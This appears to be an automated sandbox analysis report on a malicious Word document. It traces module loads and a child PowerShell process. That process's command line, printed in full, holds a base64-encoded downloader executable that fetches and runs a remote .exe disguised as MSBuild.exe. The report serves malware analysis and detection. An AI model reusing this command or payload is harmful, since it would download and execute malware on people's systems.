Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB2YWx1ZQBEb3dubG9hZC5leGUAU3lzdGVtLlRocmVhZGluZwBTdHJpbmcAR2V0Rm9sZGVyUGF0aABnZXRfRGVzdFBhdGgAc2V0X0Rlc3RQYXRoAFN5c3RlbS5Db21wb25lbnRNb2RlbABQcm9ncmFtAFN5c3RlbQByZXNvdXJjZU1hbgBNYWluAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTbGVlcABTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAERvd25sb2FkLlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBEb3dubG9hZC5Qcm9wZXJ0aWVzAFNldHRpbmdzAFByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9EZWZhdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABTdGFydABnZXRfQXNzZW1ibHkAAAAAAGloAHQAdABwADoALwAvAGEAcgBhAHMAawBhAHIAZwBvAC0AbwBuAGwAaQBuAGUALgBoAG8AcwB0AC8AZgBhAG0AaQBsAHkAcABpAGMAdAB1AHIAZQBzAC8AYQByAGEAcwAuAGUAeABlAAEZXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAADtEAG8AdwBuAGwAbwBhAGQALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAJNRQ1ozH8RAsq9CmJGMQnwABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERXQQAAQEIBQABEnEOBQABDhF5BQACDg4OCAABEoCBEYCFBSAAEoCJByACAQ4SgIkIAAESgI0SgI0It3pcVhk04IkCBg4DBhJVAwYSWQMGEhADAAAOBAABAQ4DAAABBAAAElUEAAASWQUAAQESWQQAABIQAwgADgQIABJVBAgAElkECAASEAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAANAQAIRG93bmxvYWQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQxZGJlMzY1OS00NmVjLTRkOGItODQwMC02MzViNWIzZDY3NGQAAAwBAAcxLjAuMC4wAAAEAQAAAEABADNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xzLlN0cm9uZ2x5VHlwZWRSZXNvdXJjZUJ1aWxkZXIHNC4w | - |
|
1 |
Module (148)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x64f90000 |
|
1 | |
| Load | C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x70300000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x77360000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x66d00000 |
|
6 | |
| Get Handle | c:\program files\microsoft office\office15\winword.exe | base_address = 0xc40000 |
|
1 | |
| Get Handle | c:\windows\system32\msi.dll | base_address = 0x71be0000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | USER32 | base_address = 0x77170000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x77360000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x77500000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiProvideQualifiedComponentA, address_out = 0x71c0c331 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiGetProductCodeA, address_out = 0x71c0ea84 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiReinstallFeatureA, address_out = 0x71c91cf6 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiProvideComponentA, address_out = 0x71c9f5d1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVBADigSigCallDlg@20, address_out = 0x650bfe80 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVbaInitSecurity@4, address_out = 0x65048951 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFIEPolicyAndVersion@8, address_out = 0x6503cd31 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6504882e |
|
1 | |
| Get Address | Unknown module name | function = _MsoFInitOffice@20, address_out = 0x6503cd4b |
|
1 | |
| Get Address | Unknown module name | function = _MsoUninitOffice@4, address_out = 0x64ff96db |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetFontSettings@20, address_out = 0x64ff1af9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoRgchToRgwch@16, address_out = 0x64ff9bae |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface@16, address_out = 0x64ff34e1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface2@20, address_out = 0x64ff3523 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateControl@36, address_out = 0x64ff4a26 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongLoad@8, address_out = 0x650f1250 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongSave@8, address_out = 0x650f1259 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetTooltips@0, address_out = 0x6502dfac |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetTooltips@4, address_out = 0x65052845 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLoadToolbarSet@24, address_out = 0x6503dd8b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateToolbarSet@28, address_out = 0x64ff23c9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHpalOffice@0, address_out = 0x64ffc568 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProcNeeded@4, address_out = 0x64ff18d2 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProc@24, address_out = 0x64ff2a70 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateITFCHwnd@20, address_out = 0x64ff1925 |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyITFC@4, address_out = 0x64ff958b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x64ff8820 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetComponentManager@4, address_out = 0x64ff35a4 |
|
1 | |
| Get Address | Unknown module name | function = _MsoMultiByteToWideChar@24, address_out = 0x64ffac03 |
|
2 | |
| Get Address | Unknown module name | function = _MsoWideCharToMultiByte@32, address_out = 0x64ff4d33 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrRegisterAll@0, address_out = 0x650bf8b6 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetComponentManager@4, address_out = 0x64ffc179 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateStdComponentManager@20, address_out = 0x64ff19d5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFHandledMessageNeeded@4, address_out = 0x64ff6736 |
|
1 | |
| Get Address | Unknown module name | function = _MsoPeekMessage@8, address_out = 0x64ff649f |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateIPref@28, address_out = 0x64fef9cf |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyIPref@4, address_out = 0x64ff9320 |
|
1 | |
| Get Address | Unknown module name | function = _MsoChsFromLid@4, address_out = 0x64fef864 |
|
1 | |
| Get Address | Unknown module name | function = _MsoCpgFromChs@4, address_out = 0x64ff1cc5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetLocale@4, address_out = 0x64fef984 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x64ff198e |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetVbaInterfaces@8, address_out = 0x650bff8d |
|
1 | |
| Get Address | Unknown module name | function = _MsoGetControlInstanceId@8, address_out = 0x650986e7 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x77363e59 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x77370aa2 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x77381ea6 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7739351b |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x77391ca9 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x773926fa |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7738352f |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x77383df8 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x773c7c49 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x773c93fc |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x773c944a |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x773c776e |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x773707b7 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x773c70a1 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x771867cf |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x77183622 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x77180ca1 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x771794c9 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x771834a3 |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x7717c34e |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x7717c204 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x77373dcf |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x77378e70 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x77377684 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7737cc98 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x773a903a |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x77376231 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x77375fea |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x77383f94 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x77384e9e |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x773adb72 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x77392a8c |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x773ad737 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x773ae015 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x773acc3d |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x773ad1c4 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x773ad48c |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x773ad4c6 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x773ad509 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7737e7bb |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7737e496 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7737ddf1 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x773ad53f |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x773b2055 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x773b20ea |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x773b2151 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x773b21f5 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x773b2288 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x773b2335 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x773b23d5 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x77385934 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x77385a98 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x773859b4 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x773de405 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x773def07 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x773df00a |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x773def47 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x773df15e |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x773ddbd4 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x773decfa |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x773dea66 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x773dd332 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x773dee2e |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x773dca11 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x773dcc5f |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x773dcde7 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x773dc802 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x773dec66 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x773dd155 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7737b0dc |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x77395f3e |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x77384fd0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x77380d2c |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x773959ed |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7736f8b8 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x77549d4e |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x77510782 |
|
1 | |
| Get Address | Unknown module name | function = 712, address_out = 0x66f32012 |
|
1 | |
| Get Address | Unknown module name | function = 716, address_out = 0x66f16ece |
|
1 | |
| Get Address | Unknown module name | function = 681, address_out = 0x66ef1351 |
|
1 | |
| Get Address | Unknown module name | function = 632, address_out = 0x66da7f32 |
|
1 | |
| Get Address | Unknown module name | function = 516, address_out = 0x66da92c0 |
|
1 | |
| Get Address | Unknown module name | function = 608, address_out = 0x66da8aa8 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 608, y_out = 60 |
|
2 | |
| Get Time | type = Ticks, time = 104707 |
|
1 | |
| Get Time | type = Local Time, time = 2018-10-08 23:30:11 (Local Time) |
|
1 | |
| Get Time | type = Local Time, time = 2018-10-08 23:30:18 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2018-10-08 23:30:19 (Local Time) |
|
9 | |
| Get Time | type = Local Time, time = 2018-10-08 23:31:50 (Local Time) |
|
2 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: powershell.exe
644
68
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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BAAAAPYClwAAAJ8DmwAAALAAoAAAALAEpQACAAEAAwABAAIAAwACAAYABQACAAcABwABAAgABwACAAkACQAEgAAAAQAAAAAAAAAAAAAAAAAaAAAAAgAAAAAAAAAAAAAAXQAKAAAAAAACAAAAAAAAAAAAAABdAB0DAAAAAAAAAAABAAAANwQAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGhyZWFkAERvd25sb2FkAFN5bmNocm9uaXplZAA8RGVzdFBhdGg+a19fQmFja2luZ0ZpZWxkAGRlZmF1bHRJbnN0YW5jZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBEb3dubG9hZEZpbGUAVHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB2YWx1ZQBEb3dubG9hZC5leGUAU3lzdGVtLlRocmVhZGluZwBTdHJpbmcAR2V0Rm9sZGVyUGF0aABnZXRfRGVzdFBhdGgAc2V0X0Rlc3RQYXRoAFN5c3RlbS5Db21wb25lbnRNb2RlbABQcm9ncmFtAFN5c3RlbQByZXNvdXJjZU1hbgBNYWluAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTbGVlcABTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAERvd25sb2FkLlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBEb3dubG9hZC5Qcm9wZXJ0aWVzAFNldHRpbmdzAFByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9EZWZhdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABTdGFydABnZXRfQXNzZW1ibHkAAAAAAGloAHQAdABwADoALwAvAGEAcgBhAHMAawBhAHIAZwBvAC0AbwBuAGwAaQBuAGUALgBoAG8AcwB0AC8AZgBhAG0AaQBsAHkAcABpAGMAdAB1AHIAZQBzAC8AYQByAGEAcwAuAGUAeABlAAEZXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAADtEAG8AdwBuAGwAbwBhAGQALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAJNRQ1ozH8RAsq9CmJGMQnwABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERXQQAAQEIBQABEnEOBQABDhF5BQACDg4OCAABEoCBEYCFBSAAEoCJByACAQ4SgIkIAAESgI0SgI0It3pcVhk04IkCBg4DBhJVAwYSWQMGEhADAAAOBAABAQ4DAAABBAAAElUEAAASWQUAAQESWQQAABIQAwgADgQIABJVBAgAElkECAASEAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAANAQAIRG93bmxvYWQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQxZGJlMzY1OS00NmVjLTRkOGItODQwMC02MzViNWIzZDY3NGQAAAwBAAcxLjAuMC4wAAAEAQAAAEABADNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xz |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Self Terminated |
| Monitor Duration | 00:01:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa20 |
| Parent PID | 0x900 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A24
0x
A38
0x
A3C
0x
A40
0x
A44
0x
A48
0x
A4C
0x
B48
0x
B58
0x
B68
0x
BD8
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0006ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00073fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00090000 | 0x000f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00106fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00120000 | 0x00122fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00130fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00171fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x00367fff | Pagefile Backed Memory | r |
|
|
|
- |
